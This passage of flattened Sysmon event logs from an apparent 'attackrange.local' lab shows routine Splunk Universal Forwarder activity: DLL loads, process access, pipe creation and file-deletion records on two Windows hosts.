Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057350456Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.726{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057350455Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.726{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057350454Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.726{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057350453Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.726{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057350452Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.726{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057350451Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.726{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057350450Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.726{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057350449Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.725{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057350448Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.724{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057350447Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.724{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057350446Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.724{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057350445Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.724{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057350444Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.724{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057350443Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.724{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057350442Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.722{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057350441Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.721{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057350440Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.720{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057350439Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.718{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057350438Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.718{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42trueSplunk, Inc.Valid 10341000x800000000000000057350437Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.715{8B6011A9-8868-6164-0500-00000000F101}424520C:\Windows\system32\csrss.exe{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057350436Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.715{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057350435Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.698{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057350434Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:09.697{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350433Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:09.697{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350432Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:09.697{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350431Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:09.697{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350430Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:09.697{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350429Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:09.697{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057350428Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.538{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350427Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.538{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B0E8D873C898B5AEAB8221F471243A8,SHA256=7A8F36FF7A46C6C8C48E11180227A8707263066EF9E76144FB9571FA16C2B8BCfalsetrue 10341000x800000000000000021219923Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:09.722{AD5E2759-5BBD-618E-19CE-08000000F101}18244580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219922Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:09.690{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EB438B19BC029D03660BDF4F1922BB1,SHA256=A40A572C98D5B7DA1DF29DB588205B0655D629FDE23711A598C1DEF94AF6FEAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219921Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:09.519{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5BBD-618E-19CE-08000000F101}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219920Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:09.519{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219919Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:09.519{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219918Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:09.519{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219917Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:09.519{AD5E2759-5432-6143-0500-00000000F101}4122832C:\Windows\system32\csrss.exe{AD5E2759-5BBD-618E-19CE-08000000F101}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219916Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:09.519{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219915Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:09.519{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5BBD-618E-19CE-08000000F101}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219914Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:09.504{AD5E2759-5BBD-618E-19CE-08000000F101}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219913Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:09.315{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9D00BFCDC49963EC75A950B9A1A20C95,SHA256=1F83FBE9425E73A8893F34B4F7DD5C3E279465942DF9B59AA7020C5D37DBAD3B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350426Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.496{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350425Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.496{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=611E02408194AF9526879292803DEFE0,SHA256=D59550ADE08AB93CCB62D892FA1D2BCEED88A046AEC906150BEB33299F4FF751falsetrue 534500x800000000000000057350424Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.432{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057350423Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.430{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057350422Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.430{8B6011A9-5BBD-618E-64F3-04000000F101}59169520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 